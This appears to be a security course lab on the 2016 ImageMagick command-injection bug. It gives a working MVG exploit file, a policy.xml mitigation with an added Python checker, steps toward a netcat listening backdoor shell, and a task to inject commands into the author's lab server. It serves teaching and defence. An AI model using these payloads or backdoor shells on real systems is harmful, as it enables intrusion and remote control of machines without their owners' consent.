Proj X19: Exploiting ImageMagick (Up to 30 pts.)

Purpose

This is a very simple exploit that was made public on May 4, 2016. It's a code injection vulnerability, caused by software that takes user input and uses it to construct a command line.

What You Need

Task 1: Proof of Concept (5 pts.)

Checking ImageMagick Version

This bug has been patched, so if you have recently updated, your version may not be vulnerable. To check your version, in a Kali Terminal window, execute this command:
convert -version
When I did it, my version was "ImageMagick 6.8.9-9", as shown below. This version is vulnerable. If you see a different version number, check the Sources at the bottom of this project to see if it's vulnerable.

Creating the Exploit File

In a Kali Terminal window, execute this command:
nano exploit.mvg
In nano, enter the code shown below. Notice the mismatched single-quotes and double-quotes and the https URL that won't resolve. The vulnerability is in the https processor, and the payload of this exploit is the "ls -la" at the end.
push graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com"|ls "-la)'
pop graphic-context

Press Ctrl+X, Y, Enter to save the file. In a Kali Terminal window, execute this code:

convert exploit.mvg out.png
The "ls -la" command executes, listing the files in your working directory, as shown below.

Saving the Screen Image

Make sure you can see these two required items, as shown in the image above.

Save a whole-desktop image, using a filename of "Proj X19a from YOUR NAME".

Task 2: Mitigation (5 pts.)

This mitigation prevents the exploits by disabling the vulnerable ImageMagick coders.

In a Kali Terminal window, execute this command:

nano /etc/ImageMagick-6/policy.xml
Scroll down to find the policymap section, as shown below.

Place your cursor under the <policymap> line and press the Enter key a few times to make some room, as shown below.

Insert the lines shown below in the blank region you just created.

  <policy domain="coder" rights="none" pattern="EPHEMERAL" />
  <policy domain="coder" rights="none" pattern="URL" />
  <policy domain="coder" rights="none" pattern="HTTPS" />
  <policy domain="coder" rights="none" pattern="MVG" />
  <policy domain="coder" rights="none" pattern="MSL" />

Press Ctrl+X, Y, Enter to save the file. In a Kali Terminal window, execute this code:

convert exploit.mvg out.png
The "ls -la" command does not execute. Instead, you see a "convert: not authorized" message, as shown below.
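To confirm that the policy.xml edit above actually took, here is an added checker (not part of the original project) that parses a policy.xml and reports which of the five coder patterns from Task 2 are still missing a rights="none" entry. The two sample policy files embedded below are constructed for this example; the default path is the one used in this project.

```python
# Added example: verify that an ImageMagick policy.xml disables the five coders
# that Task 2 turns off (EPHEMERAL, URL, HTTPS, MVG, MSL).
import xml.etree.ElementTree as ET

# Coder patterns that the Task 2 mitigation sets to rights="none".
REQUIRED_DISABLED = ("EPHEMERAL", "URL", "HTTPS", "MVG", "MSL")


def disabled_coders(policy_xml: str) -> set:
    """Return the set of coder patterns that policy_xml sets to rights="none"."""
    root = ET.fromstring(policy_xml)
    disabled = set()
    for policy in root.iter("policy"):
        if policy.get("domain") != "coder":
            continue
        if (policy.get("rights") or "").strip().lower() == "none":
            disabled.add((policy.get("pattern") or "").upper())
    return disabled


def missing_mitigations(policy_xml: str, required=REQUIRED_DISABLED) -> list:
    """List the required coder patterns that are NOT disabled, in the given order."""
    present = disabled_coders(policy_xml)
    return [pattern for pattern in required if pattern not in present]


def check_policy_file(path: str = "/etc/ImageMagick-6/policy.xml") -> list:
    """Read a policy.xml from disk and return the missing mitigations."""
    with open(path, encoding="utf-8") as handle:
        return missing_mitigations(handle.read())


# Constructed sample: a policy.xml without the Task 2 lines (still vulnerable).
WEAK_POLICY = """<?xml version="1.0" encoding="UTF-8"?>
<policymap>
  <policy domain="resource" name="memory" value="256MiB"/>
  <policy domain="resource" name="disk" value="1GiB"/>
</policymap>
"""

# Constructed sample: the same file after inserting the Task 2 lines.
HARDENED_POLICY = """<?xml version="1.0" encoding="UTF-8"?>
<policymap>
  <policy domain="coder" rights="none" pattern="EPHEMERAL" />
  <policy domain="coder" rights="none" pattern="URL" />
  <policy domain="coder" rights="none" pattern="HTTPS" />
  <policy domain="coder" rights="none" pattern="MVG" />
  <policy domain="coder" rights="none" pattern="MSL" />
  <policy domain="resource" name="memory" value="256MiB"/>
</policymap>
"""

if __name__ == "__main__":
    for name, text in (("weak", WEAK_POLICY), ("hardened", HARDENED_POLICY)):
        missing = missing_mitigations(text)
        print(f"{name}: {'OK' if not missing else 'missing ' + ', '.join(missing)}")
```

Run `check_policy_file()` on the Kali box after saving the file; an empty list means all five coders are disabled.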

Saving the Screen Image

Make sure you can see the "convert: not authorized" message, as shown in the image above.

Save a whole-desktop image, using a filename of "Proj X19b from YOUR NAME".

Task 3: Listening Shell (10 pts.)

First, undo the Mitigation above, so your ImageMagick is vulnerable again.

Then create a malicious file named shell.mvg that opens a listening backdoor shell. You may find this document helpful:

SANS Netcat Cheat Sheet

In a Kali Terminal window, execute this code:

convert shell.mvg out.png
Open a second Kali Terminal window, and execute this code:
netstat -pant
You should see a nc process LISTEN, as shown below.

Saving the Screen Image

Make sure you can see these two required items.

Save a whole-desktop image, using a filename of "Proj X19c from YOUR NAME".

Hints

First refer to the cheat sheet and figure out how to make a netcat listening shell. Test it by typing it into a Terminal.

Then create a bash shell script that runs your netcat shell. This makes the exploit simpler because you don't need to pass in any parameters.

Then copy and modify the exploit file above to run your shell script instead of "ls -la".

Connecting from Another Machine

On another computer, such as the host of your virtual Kali Linux machine, use nc or Ncat to connect to the listening shell and verify that you have remote control of your Kali machine, as shown below.

Task 4: Exploit My Vulnerable Server (10 pts.)

Go to this URL:

http://attack32.samsclass.info/im.htm

Get your name on the Winners page. Send in a screenshot like the one below.

Hints

You need to figure out how to execute commands with spaces and switches in them. Start with your own Kali box, as you did above, and modify the exploit file until you can execute a command like this:
ls -a -l
Once you have that working, make an exploit file that executes a command like this:
echo SAM-TESTING>/tmp/foo
Run that exploit on your own Kali machine. Verify its success with this command:
cat /tmp/foo
Then exploit my server.

Turning In Your Project

Email the image to cnit.123@gmail.com with a subject of "Project X19 from YOUR NAME".

Sources

PoC Code from Openwall
ImageTragick


Posted 5-4-16 by Sam Bowne